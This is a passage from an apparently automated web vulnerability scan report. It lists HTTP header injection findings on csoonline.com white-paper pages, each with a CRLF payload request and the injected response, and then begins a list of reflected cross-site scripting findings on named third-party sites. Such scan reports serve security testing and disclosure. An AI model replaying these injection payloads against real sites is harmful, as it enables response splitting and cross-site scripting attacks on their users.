2.34. http://www.csoonline.com/white-paper/661715/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/661715/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d3f6e%0d%0a276d482ea21 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661715/?d3f6e%0d%0a276d482ea21=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:51 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661715/protect-critical-assets-with-virtual-patching?d3f6e
276d482ea21=1
Content-Length: 148
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:32 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661715/protect-critical-assets-with-virtual-patching?d3f6e
276d482ea21=1">here</a>

2.35. http://www.csoonline.com/white-paper/661716/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/661716/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 47126%0d%0aa7aabbbb7c8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661716/?47126%0d%0aa7aabbbb7c8=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:52 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661716/an-rfp-checklist-for-next-gen-network-security?47126
a7aabbbb7c8=1
Content-Length: 149
Keep-Alive: timeout=5, max=6
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:32 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661716/an-rfp-checklist-for-next-gen-network-security?47126
a7aabbbb7c8=1">here</a>

2.36. http://www.csoonline.com/white-paper/661717/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/661717/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 161dc%0d%0a29ef911a11d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661717/?161dc%0d%0a29ef911a11d=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:53 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661717/firewalls-exposed?161dc
29ef911a11d=1
Content-Length: 120
Keep-Alive: timeout=5, max=12
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:33 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661717/firewalls-exposed?161dc
29ef911a11d=1">here</a>

2.37. http://www.csoonline.com/white-paper/661813/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/661813/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a3ded%0d%0abf172a714b5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661813/?a3ded%0d%0abf172a714b5=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:51 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661813/gartner-magic-quadrant-for-network-ips?a3ded
bf172a714b5=1
Content-Length: 141
Keep-Alive: timeout=5, max=52
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:31 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661813/gartner-magic-quadrant-for-network-ips?a3ded
bf172a714b5=1">here</a>

2.38. http://www.csoonline.com/white-paper/661814/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/661814/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 96028%0d%0a0eee729cd30 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661814/?96028%0d%0a0eee729cd30=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661814/nss-labs-network-ips-report-for-mcafee?96028
0eee729cd30=1
Content-Length: 141
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:31 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661814/nss-labs-network-ips-report-for-mcafee?96028
0eee729cd30=1">here</a>

2.39. http://www.csoonline.com/white-paper/662566/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/662566/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da36e%0d%0aed7f5cd666d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/662566/?da36e%0d%0aed7f5cd666d=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/662566/the-state-of-internet-vulnerability?da36e
ed7f5cd666d=1
Content-Length: 138
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:31 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/662566/the-state-of-internet-vulnerability?da36e
ed7f5cd666d=1">here</a>

2.40. http://www.csoonline.com/white-paper/662571/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/662571/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4bb3d%0d%0ac27e7cb52b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/662571/?4bb3d%0d%0ac27e7cb52b1=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:48 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/662571/dnssec-what-it-is-and-isn-t?4bb3d
c27e7cb52b1=1
Content-Length: 130
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:29 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/662571/dnssec-what-it-is-and-isn-t?4bb3d
c27e7cb52b1=1">here</a>

2.41. http://www.csoonline.com/white-paper/662587/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/662587/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4fa79%0d%0a6bd39cacd16 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/662587/?4fa79%0d%0a6bd39cacd16=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:46 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/662587/industry-concerned-about-dns-security-ready-to-act?4fa79
6bd39cacd16=1
Content-Length: 153
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:26 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/662587/industry-concerned-about-dns-security-ready-to-act?4fa79
6bd39cacd16=1">here</a>

2.42. http://www.csoonline.com/white-paper/663955/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/663955/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b6f83%0d%0a860f19da41a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/663955/?b6f83%0d%0a860f19da41a=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:42 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/663955/email-protection-buyer-s-guide?b6f83
860f19da41a=1
Content-Length: 133
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:22 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/663955/email-protection-buyer-s-guide?b6f83
860f19da41a=1">here</a>

2.43. http://www.csoonline.com/white-paper/663956/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/663956/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a913d%0d%0a6ec78982130 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/663956/?a913d%0d%0a6ec78982130=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:42 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/663956/anatomy-of-a-data-breach?a913d
6ec78982130=1
Content-Length: 127
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:22 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/663956/anatomy-of-a-data-breach?a913d
6ec78982130=1">here</a>

2.44. http://www.csoonline.com/white-paper/664345/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/664345/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90f3d%0d%0a920c4f9b092 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/664345/?90f3d%0d%0a920c4f9b092=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:41 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/664345/dnssec-is-a-reality?90f3d
920c4f9b092=1
Content-Length: 122
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:21 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/664345/dnssec-is-a-reality?90f3d
920c4f9b092=1">here</a>

2.45. http://www.csoonline.com/white-paper/665713/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/665713/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f586d%0d%0a9fe4b6f852e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/665713/?f586d%0d%0a9fe4b6f852e=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:32 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/665713/security-2011-knowing-where-to-look?f586d
9fe4b6f852e=1
Content-Length: 138
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:13 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/665713/security-2011-knowing-where-to-look?f586d
9fe4b6f852e=1">here</a>

2.46. http://www.csoonline.com/white-paper/666169/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/666169/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f19f4%0d%0af2feace3ab8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/666169/?f19f4%0d%0af2feace3ab8=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:29 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/666169/cloud-computing-both-sides-now?f19f4
f2feace3ab8=1
Content-Length: 133
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:10 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/666169/cloud-computing-both-sides-now?f19f4
f2feace3ab8=1">here</a>

2.47. http://www.csoonline.com/white-paper/666776/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/666776/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload aa51f%0d%0adefe5d70d0e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/666776/?aa51f%0d%0adefe5d70d0e=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:29 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/666776/it-executive-guide-to-security-intelligence?aa51f
defe5d70d0e=1
Content-Length: 146
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:10 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/666776/it-executive-guide-to-security-intelligence?aa51f
defe5d70d0e=1">here</a>

2.48. http://www.csoonline.com/white-paper/666777/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/white-paper/666777/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e905c%0d%0a1f38cab7bb1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/666777/?e905c%0d%0a1f38cab7bb1=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:25 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/666777/five-practical-steps-to-protecting-your-organization-against-breach?e905c
1f38cab7bb1=1
Content-Length: 170
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:06 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/666777/five-practical-steps-to-protecting-your-organization-against-breach?e905c
1f38cab7bb1=1">here</a>

3. Cross-site scripting (reflected) previous
There are 157 instances of this issue:

http://weekly-prizes.com/ [aff parameter]
http://weekly-prizes.com/ [sid parameter]
http://weekly-prizes.com/ [subid parameter]
http://weekly-prizes.com/1-frame.php [c parameter]
http://weekly-prizes.com/1-frame.php [name of an arbitrarily supplied request parameter]
http://weekly-prizes.com/1-frame.php [sid parameter]
http://weekly-prizes.com/1-frame.php [subid parameter]
http://weekly-prizes.com/1.php [c parameter]
http://weekly-prizes.com/1.php [subid parameter]
http://weekly-prizes.com/1.php [subid parameter]
http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]
http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]
http://www.aiglons.com/fr/offre.php [name of an arbitrarily supplied request parameter]
http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]
http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]
http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844 [name of an arbitrarily supplied request parameter]
http://www.au2m8.com/v/ [name of an arbitrarily supplied request parameter]
http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]
http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]
http://www.babypronto.com/ [name of an arbitrarily supplied request parameter]
http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 1]
